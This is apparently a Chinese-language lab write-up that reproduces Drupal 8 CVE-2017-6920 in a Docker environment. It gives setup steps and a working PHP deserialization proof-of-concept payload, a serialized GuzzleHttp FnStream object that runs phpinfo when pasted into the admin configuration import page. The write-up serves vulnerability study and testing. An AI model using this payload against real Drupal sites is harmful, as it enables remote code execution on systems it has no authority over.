Drupal Core 8 PECL YAML 反序列化任意代码执行漏洞(CVE-2017-6920)
- 影响软件:Drupal
- 方式:反序列化
- 参考链接:CVE-2017-6920:Drupal远程代码执行漏洞分析及POC构造
- 效果:任意代码执行
启动 drupal 8.3.0 的环境。
漏洞复现
环境启动后,访问 http://192.168.44.132:8080/
将会看到drupal的安装页面,一路默认配置下一步安装。因为没有mysql环境,所以安装的时候可以选择sqlite数据库。
- 先安装
yaml
扩展,需要先进入容器docker exec -it [id] /bin/bash
1 | # 换镜像源,默认带vim编辑器,所以用cat换源,可以换成自己喜欢的源 |
- .登录一个管理员账号
- 2.访问
http://127.0.0.1:8080/admin/config/development/configuration/single/import
- 3.如下图所示,
Configuration type
选择Simple configuration
,Configuration name
任意填写,Paste your configuration here
中填写PoC如下:
1 | !php/object "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\0GuzzleHttp\\Psr7\\FnStream\0methods\";a:1:{s:5:\"close\";s:7:\"phpinfo\";}s:9:\"_fn_close\";s:7:\"phpinfo\";}" |
- 4.点击
Import
后可以看到漏洞触发成功,弹出phpinfo
页面。
- Tips:
- 虽然官方 CPE 信息显示从
8.0.0
开始就有该漏洞,但是在drupal:8.0.0
容器内并没有复现成功,相同操作在drupal:8.3.0
则可以复现成功,故基础镜像选择drupal:8.3.0
- 虽然官方 CPE 信息显示从